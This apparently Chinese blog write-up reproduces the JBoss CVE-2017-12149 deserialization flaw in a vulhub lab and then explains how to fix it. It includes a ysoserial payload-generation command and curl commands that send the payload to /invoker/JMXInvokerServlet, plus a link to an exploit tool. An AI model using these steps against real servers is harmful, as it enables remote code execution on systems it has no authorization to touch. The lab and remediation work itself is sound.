一、Jboss介绍
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
二、 漏洞产生的原因
该漏洞为 Java反序列化类型,位于 Jboss 的 HttpInvoker 组件中ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。
三、漏洞影响版本
5.X 及 6.X
四、环境搭建
这里使用vulhub靶场
移动到如下路径下
/root/vulhub/jboss/CVE-2017-12149
使用docker-compose up -d
来拉取环境
拉取完成后,我们就可以在浏览器中访问:
在这里插入图片描述
到此环境搭建就完成了
五、漏洞检测和利用
(1)/invoker/readonly
靶机IP:10.168.10.129(kali)
攻击机:10.168.10.1(windows)
可以利用专门检测该漏洞的检测工具进行检查和利用
下载地址:https://github.com/yunxu1/jboss-_CVE-2017-12149
1.探测
2.利用
如图,攻击成功响应头状态码为500,响应体存在关键字jboss、Exception
(2)/invoker/JMXInvokerServlet
靶机IP:10.168.10.129(kali)
攻击机:10.168.10.128(ubuntu)
访问 /invoker/JMXInvokerServlet 会出现下载文件的弹窗
说明接口开放,此接口存在反序列化漏洞
利用ysoserial,来生成payload,
ysoserial下载链接:
https://github.com/frohoff/ysoserial/releases
如果用kali生成payload报错可能是因为内置java版本过高,我是用wiindows下生成的(jdk8)
java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/testsuccess" >1.ser
生成1.ser可以拖进到ubuntu(攻击机)
发起攻击(同时用wireshark抓包):
curl http://10.168.10.129:8080/invoker/JMXInvokerServlet --data-binary @1.ser
如果不想看见输出乱码可以将输出内容保存到文件中:
curl http://10.168.10.129:8080/invoker/JMXInvokerServlet --data-binary @1.ser --output 2.txt
攻击成功:
如果攻击成功,响应头状态码为200,响应体存在关键字:ClassCastException
六、修复建议
- 升级新版本。
- 删除
http-invoker.sar
组件。 - 添加如下代码至
http-invoker.sar
下web.xml
的security-constraint
标签中:<url-pattern>/*</url-pattern>
用于对http invoker
组件进行访问控制。
七、删除http-invoker.sar组件
删除http-invoker.sar组件,路径如下
jboss-6.1.0.Final\server\default\deploy\http-invoker.sar
/invoker/readonly
删除后访问 /invoker/readonly
状态码为404
使用工具发起攻击:
响应头返回404,攻击失败
/invoker/JMXInvokerServlet
访问 /invoker/JMXInvokerServlet
返回404
使用1.ser包
响应头返回404,攻击失败
八、附件
/invoker/JMXInvokerServlet 攻击失败:
jboss-jmx-404
/invoker/readonly 攻击失败:
jboss-readonly-404
/invoker/readonly 攻击成功:
cve-2017-12149-readonly-500
/invoker/JMXInvokerServlet 攻击成功:
cve-2017-12149-jmx-200